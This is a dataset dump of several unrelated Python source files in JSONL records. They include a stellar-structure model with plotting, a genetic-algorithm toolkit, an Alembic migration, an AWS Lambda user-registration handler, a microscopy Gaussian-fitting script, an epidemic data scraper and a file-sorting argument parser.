Flux_Conv \\\n\t\t= self.Var_Integration_Conv(n, r0, rho0, L0, T0, m0, Kappa0, p)\n\n\t\t#printing information about the produced star\n\t\tself.InfoPrint(r,m,L,T,Flux_Conv,Flux_Rad,r0,m0,L0)\n\n\t\tR_values = r/r0\n\t\tL_values = L/L0\n\t\tF_C_list = Flux_Conv[:-1]/(Flux_Conv[:-1] + Flux_Rad[:-1])\n\t\tR0 = 1\n\t\tN = len(R_values)\n\t\tshow_every = 50\n\t\tcore_limit = 0.995\n\n\t\tplt.figure()\n\t\tfig = plt.gcf() \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# get current figure\n\t\tax = plt.gca() \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# get current axis\n\t\trmax = 1.2*R0\n\t\tax.set_xlim(-rmax,rmax)\n\t\tax.set_ylim(-rmax,rmax)\n\t\tax.set_aspect('equal')\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# make the plot circular\n\t\tj = show_every\n\n\t\tfor k in range(0, N-1):\n\t\t\tj += 1\n\n\t\t\tif j >= show_every:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# don't show every step - it slows things down\n\n\t\t\t\tif(L_values[k] > core_limit):\t\t\t\t\t\t\t\t\t\t\t\t# outside core\n\n\t\t\t\t\tif(F_C_list[k] > 0.0):\t\t\t\t\t\t\t\t\t\t\t\t\t# convection\n\t\t\t\t\t\tcircR = plt.Circle((0,0),R_values[k],color='red',fill=False)\n\t\t\t\t\t\tax.add_artist(circR)\n\n\t\t\t\t\telse:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# radiation\n\t\t\t\t\t\tcircY = plt.Circle((0,0),R_values[k],color='yellow',fill=False)\n\t\t\t\t\t\tax.add_artist(circY)\n\t\t\t\telse:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# inside core\n\n\t\t\t\t\tif(F_C_list[k] > 0.0):\t\t\t\t\t\t\t\t\t\t\t\t\t# convection\n\t\t\t\t\t\tcircB = plt.Circle((0,0),R_values[k],color='blue',fill = False)\n\t\t\t\t\t\tax.add_artist(circB)\n\t\t\t\t\telse:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# radiation\n\n\t\t\t\t\t\tcircC = plt.Circle((0,0),R_values[k],color='cyan',fill = False)\n\t\t\t\t\t\tax.add_artist(circC)\n\t\t\t\tj = 0\n\n\t\tcircR = plt.Circle((2*rmax,2*rmax),0.1*rmax,color='red',fill=True)\t\t\t\t\t# These are for the legend (drawn outside the main plot)\n\t\tcircY = plt.Circle((2*rmax,2*rmax),0.1*rmax,color='yellow',fill=True)\n\t\tcircC = plt.Circle((2*rmax,2*rmax),0.1*rmax,color='cyan',fill=True)\n\t\tcircB = plt.Circle((2*rmax,2*rmax),0.1*rmax,color='blue',fill=True)\n\t\tax.legend([circR, circY, circC, circB], ['Convection outside core', 'Radiation outside core', \\\n\t\t'Radiation inside core', 'Convection inside core']) \t\t\t\t\t\t\t\t# only add one (the last) circle of each colour to legend\n\t\tplt.legend(loc=2)\n\t\tplt.xlabel('')\n\t\tplt.ylabel('')\n\t\tplt.title(Title)\t\n\t\tplt.savefig(Figname)\t\n\t\tplt.show()\n\n\n\tdef InfoPrint(self,r,m,L,T,Flux_Conv,Flux_Rad,r0,m0,L0):\n\n\t\t\"\"\"\n\t\tThis function prints useful information about the produced star.\n\n\t\t\"\"\"\n\n\t\t#finding which iteration satisfies our luminosity < 0.995 goal\n\t\tL_it = (np.where(L>= 0.995*np.max(L)))[-1][-1]\n\n\t\t#finding which iterations the the energy flux is dominated by convection\n\t\tFlux_it = np.where(np.diff(np.sign(Flux_Rad - Flux_Conv)) != 0)[-1][0]\n\n\t\t#the core radius is simply the radius at this iteration\n\t\tcore_radius = r[L_it]/r0\n\n\t\t#and the convection zone radius\n\t\tconzone_radius = r[Flux_it]/r0\n\n\t\t#printing the different attributes of our star\n\t\tprint(\"Final Mass: %g\" %(m[-1]/m0))\n\t\tprint(\"Final Radius: %g\" %(r[-1]/r0))\n\t\tprint(\"Final Luminosity: %g\" %(L[-1]/L0))\n\t\tprint(\"Core Radius: %g\" %(core_radius))\n\t\tprint(\"Convection Zone Radius: %g\" %(1-conzone_radius))\n\t\tprint(\"Mass Inside Core: %g\" %(m[L_it]/m0))\n\t\tprint(\"Core temperature: %g\" %(T[-1]))\n\n\t\tBot_it = np.where(T >= 52868)[-1][-1]\n\t\t# print(np.where(T >= 52868))\n\t\tBot = r[2433]\n\t\tprint(\"Bot Temp: %g\" %(Bot))\n\n\tdef SanityCheck_Values(self):\n\n\t\t\"\"\"\n\t\tTesting that the program where we for one itteration with specific initial values,\n\t\tand printing the results and matching them to a given solution.\n\n\t\t\"\"\"\n\n\t\t##resolution parameters, only 1 itteration (starts from 0 to n-1)\n\t\tn = int(2)\n\t\tp = 1e-3\n\n\t\t#using a prechosen set of initial values in the middle of the convection zone\n\t\tr0 = 0.84*self.R_sol\t\t\t\t\t\t\t\t\t\t\n\t\trho0 = 55.9\t\n\t\tL0 = self.L_sol\n\t\tT0 = 0.9*1e6\n\t\tm0 = 0.99*self.M_sol\n\t\tP0 = self.Pressure(rho0, T0)\n\t\tKappa0 = 3.98\n\n\t\t#solving the differential equations \n\t\tr, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad, del_Star, Flux_Rad, Flux_Conv \\\n\t\t= self.Var_Integration_Conv(n, r0, rho0, L0, T0, m0, Kappa0, p)\n\n\t\t#printing the different sanity check quantities\n\t\tprint(\"Sanity Check:\")\n\t\tprint(\"del_Stable = %g\" %del_Stable[0])\t\t\n\t\tprint(\"del_ad = %g\" %self.del_AD(P0, T0, rho0))\n\t\tprint(\"H_p = %g\" %self.H_p(T0,m0,r0))\n\t\tprint(\"xi = %g\" %self.xi_Solver(T0, rho0, Kappa0, m0, r0, L0))\n\t\tprint(\"U = %g\" %self.U)\n\t\tprint(\"del_Star = %g\" %del_Star[0])\n\t\tprint(\"v = %g\" %self.Vel_parcel(m0, r0, T0, rho0, Kappa0, L0))\n\t\tprint(\"F_C / (F_C + F_R) = %g\" %(Flux_Conv[0]/(Flux_Conv[0] + Flux_Rad[0])))\n\t\tprint(\"F_R / (F_C + F_R) = %g\" %(Flux_Rad[0]/(Flux_Conv[0] + Flux_Rad[0])))\n\n\n\n\tdef SanityCheck_Plot(self, mode):\n\n\t\t\"\"\"\n\t\tPlotting the sanity check figure for the gradients.\n\n\t\t\"\"\"\n\n\t\t#initial conditions\n\t\tr0 = self.R_s\n\t\trho0 = self.rho_s\n\t\tL0 = self.L_s\n\t\tT0 = self.T_s\n\t\tm0 = self.M_s\n\t\tKappa0 = self.Kappa(rho0, T0)\n\n\t\t#Plotting the gradient sanity figure\n\t\tif mode == \"Gradients\":\n\n\n\t\t\t#resolution parameters\n\t\t\tn = int(4e4)\n\t\t\tp = 1e-3\t\n\n\t\t\t#solving the differential equations \n\t\t\tr, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad ,del_Star, Flux_Rad, Flux_Conv \\\n\t\t\t= self.Var_Integration_Conv(n, r0, rho0, L0, T0, m0, Kappa0, p)\t\n\n\n\t\t\t#plotting the gradients as a function of radius\n\t\t\tplt.title(\"Sanity Check Temperature Gradients\")\n\t\t\tplt.semilogy(r/self.R_s, del_Stable, label = r\"$\\nabla_{Stable}$\",color= \"crimson\")\n\t\t\tplt.semilogy(r/self.R_s, del_Star, label = r\"$\\nabla^*$\", color = \"royalblue\")\n\t\t\tplt.semilogy(r/self.R_s, del_ad, label = r\"$\\nabla_{ad}$\", color = \"mediumseagreen\")\n\t\t\tplt.grid(linewidth = 0.5, linestyle= \"--\")\n\t\t\tplt.legend()\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"Gradients\")\n\t\t\tplt.savefig(\"SanityPlot.pdf\")\n\t\t\tplt.show()\n\n\n\t\t#Plotting the cross section sanity figure\n\t\tif mode == \"CrossSection\":\n\n\n\t\t\t#resolution parameters\n\t\t\tn = int(2.95e4)\n\t\t\tp = 1e-3\n\n\t\t\t#specifics to cross section subfunction\n\t\t\tTitle = \"Sanity Check Cross-Section\"\n\t\t\tFigname = \"SanityCrossSection.pdf\"\n\n\t\t\t#plotting the cross section\n\t\t\tself.CrossSection(n, r0, rho0, L0, T0, m0, Kappa0, Title, Figname, p)\n\n\t\t#if none of the above is selected\n\t\telse:\n\n\t\t\tprint(\"Please select either 'Gradients' or 'CrossSection' as input argument.\")\n\n\n\n\tdef VaryingInitiParam(self,parameter):\n\n\t\t\"\"\"\n\t\tHere we try out different initial parameters to see which results in larger \n\t\tconvection zones. \n\n\t\t\"\"\"\n\n\t\t#resolution parameters\n\t\tn = int(1e4)\n\t\tp = 1e-2\n\n\n\t\t#Varying Radius\n\t\tif parameter == \"Radius\":\n\n\t\t\t#Inital values and labels\n\t\t\tr0 =[self.R_s/3, self.R_s/2, self.R_s, 2*self.R_s, 3*self.R_s, 4*self.R_s, 5*self.R_s]\n\t\t\tlabels_R = [\"1/3\", \"1/2\", \"1\", \"2\", \"3\", \"4\", \"5\"]\n\n\t\t\tfor i in range(len(r0)):\n\n\t\t\t\t#solving the differential equations \n\t\t\t\tr, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad, del_Star, Flux_Rad, Flux_Conv \\\n\t\t\t\t= self.Var_Integration_Conv(n, r0[i], self.rho_s, self.L_s, self.T_s, self.M_s, self.Kappa(self.rho_s, self.T_s), p)\n\n\t\t\t\t#plotting the figure\n\t\t\t\tplt.figure(1)\n\t\t\t\tplt.plot(r/r0[i], (Flux_Conv[:-1]/(Flux_Conv[:-1]+Flux_Rad[:-1])),label = \"%s$R_0$\"%labels_R[i])\n\t\t\t\tplt.title(r\"Convection for varying $R_0$\")\n\t\t\t\tplt.legend()\n\t\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\t\tplt.ylabel(\"$F_C/F_{tot}$\")\n\t\t\t\tplt.grid(linewidth=0.5)\n\t\t\t\tplt.xlim(0.85,1)\n\t\t\t\t# plt.savefig(\"Vary_R.pdf\")\n\t\t\t\n\t\t\tplt.show()\n\n\n\t\t#Varying Density\n\t\tif parameter == \"Density\":\n\n\t\t\t#Inital values and labels\n\t\t\t# rho0 =[self.rho_s, 5*self.rho_s, 15*self.rho_s, 35*self.rho_s, 80*self.rho_s, 120*self.rho_s, 200*self.rho_s]\n\t\t\t# labels_rho = [\"1\", \"5\", \"15\", \"35\", \"80\", \"120\", \"200\"]\n\n\t\t\trho0 =[self.rho_s/3, self.rho_s/2, self.rho_s, 2*self.rho_s, 3*self.rho_s, 4*self.rho_s, 5*self.rho_s]\n\t\t\tlabels_rho = [\"1/3\", \"1/2\", \"1\", \"2\", \"3\", \"4\", \"5\"]\n\n\t\t\tfor i in range(len(rho0)):\n\n\t\t\t\t#solving the differential equations \n\t\t\t\tr, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad, del_Star, Flux_Rad, Flux_Conv \\\n\t\t\t\t= self.Var_Integration_Conv(n, self.R_s, rho0[i], self.L_s, self.T_s, self.M_s, self.Kappa(rho0[i], self.T_s), p)\n\n\t\t\t\t#plotting the figure\n\t\t\t\tplt.figure(1)\n\t\t\t\tplt.plot(r[:-1]/self.R_s, (Flux_Conv[:-1]/(Flux_Conv[:-1]+Flux_Rad[:-1])),label = r\"%s$\\rho_0$\"%labels_rho[i])\n\t\t\t\tplt.title(r\"Convection for varying $\\rho_0$\")\n\t\t\t\tplt.legend()\n\t\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\t\tplt.ylabel(\"$F_C/F_{tot}$\")\n\t\t\t\tplt.grid(linewidth=0.5)\n\t\t\t\tplt.xlim(0.85,1)\n\t\t\t\t# plt.savefig(\"Vary_rho.pdf\")\n\t\t\t\n\t\t\tplt.show()\n\n\n\t\t#Varying Radius\n\t\tif parameter == \"Temperature\":\n\n\t\t\t#Inital values and labels\n\t\t\tT0 =[self.T_s/3, self.T_s/2, self.T_s, 2*self.T_s, 3*self.T_s, 4*self.T_s, 5*self.T_s]\n\t\t\tlabels_T = [\"1/3\", \"1/2\", \"1\", \"2\", \"3\", \"4\", \"5\"]\n\n\t\t\tfor i in range(len(T0)):\n\n\t\t\t\t#solving the differential equations \n\t\t\t\tr, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad, del_Star, Flux_Rad, Flux_Conv \\\n\t\t\t\t= self.Var_Integration_Conv(n, self.R_s, self.rho_s, self.L_s, T0[i], self.M_s, self.Kappa(self.rho_s, T0[i]), p)\n\n\t\t\t\t#plotting the figure\n\t\t\t\tplt.figure(1)\n\t\t\t\tplt.plot(r[:-1]/self.R_s, (Flux_Conv[:-1]/(Flux_Conv[:-1]+Flux_Rad[:-1])),label = \"%s$T_0$\"%labels_T[i])\n\t\t\t\tplt.title(r\"Convection for varying $T_0$\")\n\t\t\t\tplt.legend()\n\t\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\t\tplt.ylabel(\"$F_C/F_{tot}$\")\n\t\t\t\tplt.grid(linewidth=0.5)\n\t\t\t\tplt.xlim(0.95,1)\n\t\t\t\t# plt.savefig(\"Vary_T.pdf\")\n\t\t\t\n\t\t\tplt.show()\n\n\t\t#if none of the above are selected\n\t\telse:\n\n\t\t\tprint(\"Please select either 'Radius', 'Density' or 'Temperature' as input argument.\")\n\n\n\tdef TestingParam(self):\n\n\t\t\"\"\"\n\t\tHere we look for the best parameter\n\n\t\t\"\"\"\n\n\t\t#resolution parameters\n\t\tn = int(1e4)\n\t\tp = 1e-2\n\n\t\t#scaling the initial values\n\t\tr_scale = 1.2\n\t\trho_scale = 150\n\t\tT_scale = 0.95\n\n\t\t#initial conditions of the star\n\t\tr0 = r_scale*self.R_s\n\t\trho0 = rho_scale*self.rho_s\n\t\tT0 = T_scale*self.T_s\n\t\tL0 = self.L_s\n\t\tm0 = self.M_s\n\t\tKappa0 = self.Kappa(rho0, T0)\n\n\t\t#setting title and figure name as input for the cross section function\n\t\tTitle = r\"$R_0 = 1.2\\cdot R_\\odot \\rho_0 = 150\\rho_0, T_0 = 0.95\\cdot T_0$\"\n\t\tFigname = \"random.pdf\"\n\n\t\t#plotting the cross section\n\t\tself.CrossSection(n, r0, rho0, L0, T0, m0, Kappa0, Title, Figname, p)\n\n\n\n\n\tdef FinalModel(self,mode):\n\n\t\t\"\"\"\n\t\tHere we can vary the initial parameters and study the resulting star.\n\n\t\t\"\"\"\n\t\t#scaling the initial values\n\t\tr_scale = 1.2\n\t\trho_scale = 150\n\t\tT_scale = 0.95\n\n\t\t#initial conditions of the star\n\t\tr0 = r_scale*self.R_s\n\t\trho0 = rho_scale*self.rho_s\n\t\tT0 = T_scale*self.T_s\n\t\tL0 = self.L_s\n\t\tm0 = self.M_s\n\t\tKappa0 = self.Kappa(rho0, T0)\n\n\t\t#resolution parameters\n\t\tn = int(1e4)\n\t\tp = 2.3e-3\n\n\t\tif mode == \"CrossSection\":\n\n\t\t\t#setting title and figure name as input for the cross section function\n\t\t\tTitle = \"Final Cross Section\"\n\t\t\tFigname = \"FinalStar.pdf\"\n\n\t\t\t#plotting the cross section\n\t\t\tself.CrossSection(n, r0, rho0, L0, T0, m0, Kappa0, Title, Figname, p)\n\n\n\t\tif mode == \"FinalModel\":\n\n\n\t\t\t#solving the differential equations \n\t\t\tr, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad, del_Star, Flux_Rad, Flux_Conv \\\n\t\t\t= self.Var_Integration_Conv(n, r0, rho0, L0, T0, m0, Kappa0, p)\n\n\t\t\t#printing usefull information about the star\n\t\t\tself.InfoPrint(r,m,L,T,Flux_Conv,Flux_Rad,r0,m0,L0)\n\n\n\t\t\t#ploting all variables as a function of radius instead of mass\n\t\t\tplt.figure(1)\n\t\t\tplt.plot(r/r0, L, label = \"$L(R)$\", color = \"royalblue\")\n\t\t\tplt.title(\"Luminosity vs. radius\")\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"L [J]\")\n\t\t\tplt.legend()\n\t\t\tplt.grid(linewidth=0.5, linestyle= \"--\")\n\t\t\t# plt.savefig(\"L_final.pdf\")\t\n\n\t\t\tplt.figure(2)\n\t\t\tplt.plot(r/r0, m, label = \"$M(R)$\", color = \"royalblue\")\n\t\t\tplt.title(\"Mass vs. radius\")\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"M [kg]\")\n\t\t\tplt.legend()\n\t\t\tplt.grid(linewidth=0.5, linestyle= \"--\")\n\t\t\t# plt.savefig(\"m_final.pdf\")\t\n\n\t\t\tplt.figure(3)\n\t\t\tplt.semilogy(r/r0, P, label = \"$P(R)$\", color = \"royalblue\")\n\t\t\tplt.title(\"Pressure vs. radius\")\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"$P [Pa]$\")\n\t\t\tplt.legend()\n\t\t\tplt.grid(linewidth=0.5, linestyle= \"--\")\n\t\t\t# plt.savefig(\"P_final.pdf\")\t\t\n\n\t\t\tplt.figure(4)\n\t\t\tplt.semilogy(r/r0, rho, label = r\"$\\rho(R)$\", color = \"royalblue\")\n\t\t\tplt.title(\"Density vs. radius\")\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(r\"$\\rho$ [kg/m^3]\")\n\t\t\tplt.legend()\n\t\t\tplt.grid(linewidth=0.5, linestyle= \"--\")\n\t\t\t# plt.savefig(\"rho_final.pdf\")\t\t\n\n\t\t\tplt.figure(5)\n\t\t\tplt.plot(r/r0, T, label = \"$T(R)$\", color = \"royalblue\")\n\t\t\tplt.title(\"Temperature vs. radius\")\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"T [K]\")\n\t\t\tplt.legend()\n\t\t\tplt.grid(linewidth=0.5, linestyle= \"--\")\n\t\t\t# plt.savefig(\"T_final.pdf\")\t\t\n\n\t\t\tplt.figure(6)\n\t\t\tplt.plot(r[:-1]/r0, Flux_Conv[:-1]/(Flux_Conv[:-1]+Flux_Rad[:-1]), label = \"$F_C(R)/F_{tot}$\", color = \"royalblue\")\n\t\t\tplt.plot(r[:-1]/r0, Flux_Rad[:-1]/(Flux_Conv[:-1]+Flux_Rad[:-1]), label = \"$F_R(R)/F_{tot}$\", color = \"crimson\")\n\t\t\tplt.title(\"Flux vs. radius\")\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"Flux Fractions\")\n\t\t\tplt.legend()\n\t\t\tplt.grid(linewidth=0.5, linestyle= \"--\")\n\t\t\t# plt.savefig(\"F_final.pdf\")\t\n\n\t\t\tplt.figure(7)\n\t\t\tplt.plot(r[100:-1]/r0, PP1[100:-1]/epsilon[100:-1], label = \"$\\epsilon_{PP1}/\\epsilon_{tot}$\", color = \"royalblue\")\n\t\t\tplt.plot(r[100:-1]/r0, PP2[100:-1]/epsilon[100:-1], label = \"$\\epsilon_{PP2}/\\epsilon_{tot}}$\", color = \"crimson\")\n\t\t\tplt.plot(r[100:-1]/r0, epsilon[100:-1]/epsilon[-2], label = \"$\\epsilon_{tot}}$\", color = \"mediumseagreen\")\n\t\t\tplt.title(\"$\\epsilon$ contribution along with $\\epsilon_{tot}$ vs. radius\")\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"Energy Fractions\")\n\t\t\tplt.legend()\n\t\t\tplt.grid(linewidth=0.5)\n\t\t\t# plt.savefig(\"E_final.pdf\")\t\n\n\t\t\tplt.figure(8)\n\t\t\tplt.title(\"Temperature Gradients vs. radius\")\n\t\t\tplt.semilogy(r/r0, del_Stable, label = r\"$\\nabla_{Stable}$\",color= \"crimson\")\n\t\t\tplt.semilogy(r/r0, del_ad, label = r\"$\\nabla_{ad}$\", color = \"mediumseagreen\")\n\t\t\tplt.semilogy(r/r0, del_Star, label = r\"$\\nabla^*$\", color = \"royalblue\")\n\t\t\tplt.grid(linewidth = 0.5, linestyle= \"--\")\n\t\t\tplt.legend()\n\t\t\tplt.xlabel(\"$R/R_0$\")\n\t\t\tplt.ylabel(\"Gradients\")\n\t\t\tplt.savefig(\"Grad_finalx.pdf\")\t\n\n\t\t\tplt.show()\n\n\n\nif __name__ == \"__main__\":\n\n\t\"\"\"\n\tTesting the program. Stuff written here will not be imported along with the class into other files.\n\n\t\"\"\"\n\n\tStellar = StarModel()\n\t# Stellar.SanityCheck_Values()\n\n\t# Stellar.SanityCheck_Plot(\"Gradients\")\n\t# Stellar.SanityCheck_Plot(\"CrossSection\")\n\n\t# Stellar.VaryingInitiParam(\"Density\")\n\n\t# Stellar.TestingParam()\n\n\t# Stellar.FinalModel(\"FinalModel\")\n\tStellar.FinalModel(\"CrossSection\")\n\n\n\n","sub_path":"Project2/SanProject2.py","file_name":"SanProject2.py","file_ext":"py","file_size_in_byte":22880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"416179016","text":"import random\nfrom Task.Chromosome import Chromosome\n\n\n# Class to represent biological processes\nclass BiologicalProcessManager:\n\t\t'''\n\t\t\tCrossover Function\n\n\t\t\t- The process of One-Point crossover is exercised in this function.\n\t\t'''\n\t\tdef crossover(crossover_rate, parentOne, parentTwo):\n\t\t\trandom_probability = random.uniform(0, 1)\n\t\t\tif random_probability > crossover_rate:\n\t\t\t\tpivot = random.randint(0, len(parentOne.genotype_representation)-1)\n\t\t\t\tchild_one_genotype = parentOne.genotype_representation[:pivot] + parentTwo.genotype_representation[pivot:]\n\t\t\t\tchild_two_genotype = parentTwo.genotype_representation[:pivot] + parentOne.genotype_representation[pivot:]\n\t\t\t\tchild_one = Chromosome(parentOne.alpha, parentOne.number_of_edge, parentOne.number_of_user, parentOne.pre_tf, child_one_genotype)\n\t\t\t\tchild_two = Chromosome(parentOne.alpha, parentOne.number_of_edge, parentOne.number_of_user, parentOne.pre_tf, child_two_genotype)\n\t\t\t\treturn child_one, child_two\n\t\t\telse:\n\t\t\t\treturn parentOne, parentTwo\n\n\n\t\t'''\n\t\t\tMutation function\n\n\t\t\t- The process of Random Resetting is exercised in this function.\n\t\t'''\n\t\tdef mutate(mutation_rate, child, candidates):\n\t\t\tfor index, position in enumerate(child.genotype_representation):\n\t\t\t\trandom_probability = random.uniform(0, 1)\n\t\t\t\t'''\n\t\t\t\t\t(Random Resetting) \"Flip\" the position with another knapsack if probability < mutation_rate\n\t\t\t\t'''\n\t\t\t\tif random_probability > mutation_rate:\n\t\t\t\t\tchild.genotype_representation[index] = candidates[index][random.randint(0, len(candidates)-1)]\n\n\n\n\n\n","sub_path":"Edge Computing/Task/genetic_toolkit.py","file_name":"genetic_toolkit.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"584411496","text":"\"\"\"added user last seen\n\nRevision ID: ad752103553e\nRevises: 9b4def72bca2\nCreate Date: 2020-11-14 16:04:38.922512\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ad752103553e'\ndown_revision = '9b4def72bca2'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('last_seen', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'last_seen')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/ad752103553e_added_user_last_seen.py","file_name":"ad752103553e_added_user_last_seen.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"222122886","text":"import json\nimport boto3\nimport urllib.parse\nimport time\nimport decimal\nimport os\n\n# DynamoDBオブジェクト\ndynamodb = boto3.resource('dynamodb')\n\n# 連番を更新して返す関数\ndef next_seq(table,tablename):\n response = table.update_item(\n Key={\n 'tablename' : tablename\n },\n UpdateExpression=\"set seq = seq + :val\",\n ExpressionAttributeValues= {\n ':val' : 1\n },\n ReturnValues='UPDATED_NEW'\n )\n return response['Attributes']['seq']\n\ndef lambda_handler(event, context):\n try:\n # シーケンスデータを得る\n seqtable = dynamodb.Table('sequence')\n nextseq = next_seq(seqtable, 'user')\n\n # フォームに入力されたデータを得る\n param = urllib.parse.parse_qs(event['body'])\n username = param['username'][0]\n email = param['email'][0]\n\n # クライアントのIPを得る\n host = event['requestContext']['identity']['sourceIp']\n\n # 現在のUNIXタイムスタンプを得る\n now = time.time()\n\n\n # 署名付きURLを作る\n s3 = boto3.client('s3')\n url = s3.generate_presigned_url(\n ClientMethod = 'get_object',\n Params = {'Bucket' : os.environ['bucketname'], 'Key' : 'test.jpg'},\n ExpiresIn = 48 * 60 * 60,\n HttpMethod = 'Get')\n\n # userテーブルに登録する\n usertable = dynamodb.Table(\"user\")\n usertable.put_item(\n Item={\n 'id' : nextseq,\n 'username' : username,\n 'email' : email,\n 'accepted_at' : decimal.Decimal(str(now)),\n 'host' : host,\n 'url' : url\n }\n )\n\n\n # 結果を返す\n return {\n 'statusCode' : 200,\n 'headers' : {\n 'content-type' : 'text/html'\n },\n 'body' : '登録ありがとうございました。'\n }\n\n except:\n import traceback\n traceback.print_exc()\n return {\n 'statusCode' : 500,\n 'headers' : {\n 'content-type' : 'text/html'\n },\n 'body' : '内部エラーが発生しました。'\n }\n","sub_path":"signedURL.py","file_name":"signedURL.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"593884182","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 19 14:21:04 2016\n\n@author: George\n\"\"\"\n\n\nimport os, sys\nimport numpy\n\npath_to_github = 'C:\\\\Users\\\\George\\\\Documents\\\\GitHub'\n\nsys.path.insert(1,os.path.join(path_to_github,'Flika'));\nfrom FLIKA import *\napp = QApplication(sys.argv); initializeMainGui()\n\n\nfrom plugins.detect_puffs.gaussianFitting import fitGaussian\n\n# cutout bead \n# subtract background\nI_whole=g.m.currentWindow.image\n\nxorigin=100\nyorigin=100\nsigma=2\namplitude=800\np0=[xorigin, yorigin, sigma,amplitude]\nbounds=[(xorigin-5,xorigin+5), (yorigin-5,yorigin+5),(sigma-1, sigma+2), (amplitude-500, amplitude+500)]\n\n\nanswer = []\n\nfor i in range(len(I_whole)):\n I=I_whole[i]\n p, I_fit, I_fit = fitGaussian(I, p0, bounds)\n answer.append(p)\n\nfilename = 'J:\\\\WORK_IN_PROGRESS\\\\CellLights_AND_FIXATION\\\\cellLights_beads_100nm\\\\File_002_croppedBead3_result.txt'\nnp.savetxt(filename, answer, delimiter=',')\nprint(\"Result File Saved\")","sub_path":"UCI/guassianFit_bead_FLIKA 2.py","file_name":"guassianFit_bead_FLIKA 2.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"471925266","text":"#coding=utf-8\n\nfrom bs4 import BeautifulSoup\nimport re\nimport requests\nimport json\nfrom Provinces import Province\nfrom datetime import datetime\nfrom functions import *\n\nnow_txt = '{}年{}月{}日-{}时{}分.txt'.format(datetime.today().year,datetime.today().month,datetime.today().day,datetime.today().hour,datetime.today().minute)\nnow_csv = '{}年{}月{}日-{}时{}分.csv'.format(datetime.today().year,datetime.today().month,datetime.today().day,datetime.today().hour,datetime.today().minute)\n\nurl = \"https://3g.dxy.cn/newh5/view/pneumonia\"\nreq = requests.get(url)\nreq.encoding = 'utf-8'\n\ninfo_raw = BeautifulSoup(req.text, 'html.parser')\ninfo_raw = info_raw.find(id = \"getListByCountryTypeService1\").get_text()\npattern = re.compile(r'\\[.*\\]')\nresult = pattern.search(info_raw)\n\nresult_dict = json.loads(result.group())\n\nProvince_list = []\nfor item in result_dict:\n Province_list.append(Province(item['id'],item['createTime'],item['modifyTime'],item['provinceName'],item['provinceShortName'],item['sort'],item['tags']))\n\n#保存json文件\nwith open('D:\\MyGit\\Real-time-dynamic-query-of-pneumonia\\Data Record\\\\'+now_txt,'w+',encoding = 'utf-8') as file:\n file.write(result.group())\n\n#保存csv文件\nDicToCSV(result_dict,now_csv)\nToCSV_separately(Province_list)\n","sub_path":"GetInformation.py","file_name":"GetInformation.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"651498612","text":"import argparse\nimport sys\nimport os\nfrom distutils.util import strtobool\n\n# from http://stackoverflow.com/a/22222073\ndef user_yes_no_query(question):\n sys.stdout.write('%s [y/n]\\n' % question)\n while True:\n try:\n return strtobool(raw_input().lower())\n except ValueError:\n sys.stdout.write('Please respond with \\'y\\' or \\'n\\'.\\n')\n\ndef parse():\n \"\"\"\n Option parser\n \"\"\"\n # Parser definition.\n parser=argparse.ArgumentParser(description=\"Sort files from a source into a destination using their extension's.\")\n parser.add_argument('source', help=\"The source for the files.\")\n parser.add_argument('destination', help=\"The destination for the files.\")\n parser.add_argument('-f', '--force', dest='force', action='store_true', help=\"Disable interactive mode.\")\n parser.add_argument('-q', '--quick-sort', dest='quick', action='store_true', help=\"Disable file checksums for quick sorting. May result in data loss.\")\n# parser.add_argument('-l', '--log-level', dest='log', type=int, help=\"Specify source from where gathering files\")\n# parser.add_argument('-v', '--version', action='version', version='')\n\n # Print help if arguments parser fails.\n try:\n args = parser.parse_args()\n return(args)\n except:\n parser.print_help()\n 